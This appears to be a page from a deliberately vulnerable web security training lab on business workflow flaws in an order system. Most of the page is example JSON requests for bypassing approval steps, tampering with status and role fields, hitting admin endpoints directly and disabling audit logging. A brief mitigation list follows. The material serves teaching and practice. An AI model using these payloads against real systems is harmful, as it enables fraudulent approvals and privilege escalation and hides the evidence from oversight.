Lab 3: Workflow Flaws

Workflow flaws vulnerabilities

Difficulty: Medium

Lab Overview

This lab demonstrates workflow flaws vulnerabilities where attackers can bypass business process controls, skip approval steps, and manipulate workflow states to gain unauthorized access or benefits.

Objective: Understand how workflow flaws attacks work and how to exploit them.

Vulnerable Order System
Create Order

This system allows creating orders. Try to bypass workflow controls:

Workflow Bypass Tester
⚠️ Workflow Flaws Warning

This lab demonstrates workflow flaws vulnerabilities:

  • No Authorization - No proper workflow authorization
  • Status Manipulation - Status can be modified directly
  • Skip Approval - Can skip approval steps
  • No Validation - No workflow validation
Bypass Techniques

These techniques can be used for workflow bypass:

  • Status Manipulation - Modify workflow status
  • Skip Steps - Bypass approval steps
  • Parameter Tampering - Modify workflow parameters
  • Direct Access - Access workflow endpoints directly
Workflow Flaws Techniques
Status Manipulation
// Modify workflow status directly { "order_id": 1, "status": "completed" // Skip approval steps }
Skip Approval Steps
// Skip approval workflow { "order_id": 1, "skip_approval": true, "status": "approved" }
Parameter Tampering
// Modify workflow parameters { "order_id": 1, "approver_id": "admin", "bypass_workflow": true }
Direct Access
// Access workflow endpoints directly POST /admin/approve_order { "order_id": 1, "admin_override": true }
Role Escalation
// Escalate user role { "order_id": 1, "user_role": "admin", "approval_level": "high" }
Time Manipulation
// Manipulate workflow timing { "order_id": 1, "created_at": "2024-01-01", "expires_at": "2025-12-31" }
Vulnerability Details
  • Type: Workflow Flaws
  • Severity: Medium
  • Method: Status manipulation
  • Issue: No proper workflow validation
Attack Vectors
  • Status Manipulation: Modify workflow status
  • Skip Steps: Bypass approval steps
  • Parameter Tampering: Modify workflow parameters
  • Direct Access: Access workflow endpoints directly
Workflow Flaws Examples

Use these techniques to exploit workflow flaws vulnerabilities:

1. Basic Status Manipulation:
// Original request POST /create_order { "customer_name": "John Doe", "amount": 99.99, "status": "pending" } // Bypassed request POST /create_order { "customer_name": "John Doe", "amount": 99.99, "status": "completed" // Skip approval }
2. Skip Approval Steps:
// Skip approval workflow { "order_id": 1, "skip_approval": true, "status": "approved", "approver_id": "admin", "approval_date": "2024-01-01" }
3. Parameter Tampering:
// Modify workflow parameters { "order_id": 1, "approver_id": "admin", "approval_level": "high", "bypass_workflow": true, "admin_override": true }
4. Direct Access:
// Access workflow endpoints directly POST /admin/approve_order { "order_id": 1, "admin_override": true, "skip_validation": true } // Or use different endpoints POST /workflow/bypass POST /admin/workflow/override POST /internal/approve
5. Role Escalation:
// Escalate user role { "order_id": 1, "user_role": "admin", "approval_level": "high", "permissions": ["approve", "override", "bypass"] }
6. Time Manipulation:
// Manipulate workflow timing { "order_id": 1, "created_at": "2024-01-01", "expires_at": "2025-12-31", "approval_deadline": "2024-12-31", "time_override": true }
7. Workflow State Bypass:
// Bypass workflow states { "order_id": 1, "current_state": "completed", "target_state": "completed", "skip_states": ["pending", "approved"], "workflow_override": true }
8. Approval Chain Bypass:
// Bypass approval chain { "order_id": 1, "approval_chain": ["admin", "manager"], "current_approver": "admin", "skip_chain": true, "direct_approval": true }
9. Workflow Rules Bypass:
// Bypass workflow rules { "order_id": 1, "workflow_rules": { "require_approval": false, "require_documentation": false, "require_verification": false }, "rule_override": true }
10. Workflow Validation Bypass:
// Bypass workflow validation { "order_id": 1, "validation_checks": { "amount_check": false, "approver_check": false, "status_check": false }, "skip_validation": true }
11. Workflow Audit Bypass:
// Bypass workflow audit { "order_id": 1, "audit_trail": { "enabled": false, "log_actions": false, "track_changes": false }, "audit_override": true }
12. Workflow Permissions Bypass:
// Bypass workflow permissions { "order_id": 1, "permissions": { "can_approve": true, "can_override": true, "can_bypass": true, "admin_access": true }, "permission_override": true }
13. Workflow Context Bypass:
// Bypass workflow context { "order_id": 1, "workflow_context": { "environment": "production", "user_type": "admin", "access_level": "high" }, "context_override": true }
14. Workflow History Bypass:
// Bypass workflow history { "order_id": 1, "workflow_history": { "track_changes": false, "log_approvals": false, "record_actions": false }, "history_override": true }
15. Workflow Integration Bypass:
// Bypass workflow integration { "order_id": 1, "workflow_integration": { "external_systems": false, "api_validation": false, "service_checks": false }, "integration_override": true }
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper workflow validation
  • Use secure workflow state management
  • Implement proper authorization checks
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual workflow patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use workflow verification systems
  • Implement proper audit trails